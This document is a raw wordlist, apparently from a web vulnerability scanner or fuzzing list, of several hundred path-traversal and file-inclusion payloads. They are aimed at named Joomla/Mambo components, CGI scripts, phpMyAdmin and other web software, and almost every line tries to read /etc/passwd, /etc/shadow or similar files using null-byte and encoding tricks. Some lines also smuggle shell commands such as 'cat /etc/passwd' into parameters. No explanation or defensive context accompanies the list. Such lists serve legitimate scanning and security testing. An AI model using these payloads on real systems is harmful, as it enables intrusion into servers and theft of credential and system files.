components/com_babackup/classes/Tar.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_colophon/admin.colophon.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_galleria/galleria.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_hashcash/server.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_joomlaboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_rssxt/rssxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_fm/fm.install.php?lm_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_forum/download.php?phpbb_root_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/minibb/index.php?absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_moodle/moodle.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mambowiki/MamboLogin.php?IP=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_madeira/img.php?url=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mmp/help.mmp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mospray/scripts/admin.php?basedir=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mosmedia/media.tab.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_lmo/lmo.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jim/install.jim.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_zoom/classes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_uhp2/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_securityimages/lang.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_smf/smf.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_peoplebook/param.peplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_performs/performs.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_panoramic/admin.panoramic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_x-shop/admin.x-shop?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jreactions/langset.php?comPath=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_juser/xajax_functions.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_pro_desk&include_file=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_rssreader/admin.rssreader.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
webauction/index.php?-table=books&-action=browse_by_cat&-cursor=0&-skip=0&-limit=30&-mode=list&-lang=../../../../../../../../../etc/passwd%00
librariandb/index.php?-table=books&-action=browse_by_cat&-cursor=0&-skip=0&-limit=30&-mode=list&-lang=../../../../../../../../../etc/passwd%00
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_color/admin.color.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_smf/smf.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
akocomments.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_bsq_sitestats/external/rssfeed.php?baseDir=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_Jambook/jambook.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_omphotogallery&controller=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../etc/passwd%00
com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
com_media_library/toolbar_ext.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_projectfork&section=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_googlebase/|/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_jreactions/langset.php?comPath=../../../../../../../../../../../../../../../../etc/passwd%00
administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
com_thopper/inc/contact_type.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
components/com_be_it_easypartner/be_it_easypartner.ajax.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_ clickheat&task=../../../../../../../../../../../../../../../../etc/passwd%00
templates/be2004-2/index.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../../../../../../../../../../etc/passwd%00
modules/mod_calendar.php?absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
classes/html/com_articles.php?absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd
index.php?|=../../../../../../../../../etc/passwd
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
DomainFiles/*//../../../../../../../../../../etc/passwd
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
index.php?download=/etc/passwd
index.php?page=../../../../../../../../../../etc/passwd
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phptonuke.php?filnavn=/etc/passwd
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
viewpage.php?file=/etc/passwd
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=../../../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/opendir.php?/etc/passwd
cgi-bin/nph-emumail.cgi?type=../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/viewsource?/etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&fileNikto=/../../../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
page.cgi?../../../../../../../../../../etc/passwd
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
athenareg.php?pass=%20;cat%20/etc/passwd
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
search?NS-query-pat=../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
................../etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/campas?%0acat%0a/etc/passwd%0a
basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu
cgi-bin/phf?QNikto=root%0Acat%20/etc/passwd%20
cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd
.../.../.../.../.../.../.../.../.../.../etc/passwd
etc/passwd
mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
tmp_view.php?file=/etc/passwd
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
///////../../../../../../etc/passwd
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
etc/passwd
directory.php?dir=%3Bcat%20/etc/passwd
content/base/build/explorer/none.php?/etc/passwd
cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
export.php?what=../../../../../../../../../../../../etc/passwd%00
3rdparty/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00
phpmyadminexport.php?what=../../../../../../../../../../../../etc/passwd%00
pmaexport.php?what=../../../../../../../../../../../../etc/passwd%00
~nobody/etc/passwd
dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
shoutbox.php?conf=../../../../../../../etc/passwd
admin/system.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=cat%20/etc/passwd
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/ion-p?page=../../../../../etc/passwd
gallery/index.php?include=../../../../../../../../../etc/passwd
modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
phprocketaddin/?page=../../../../../../../../../../etc/passwd
axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd
pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
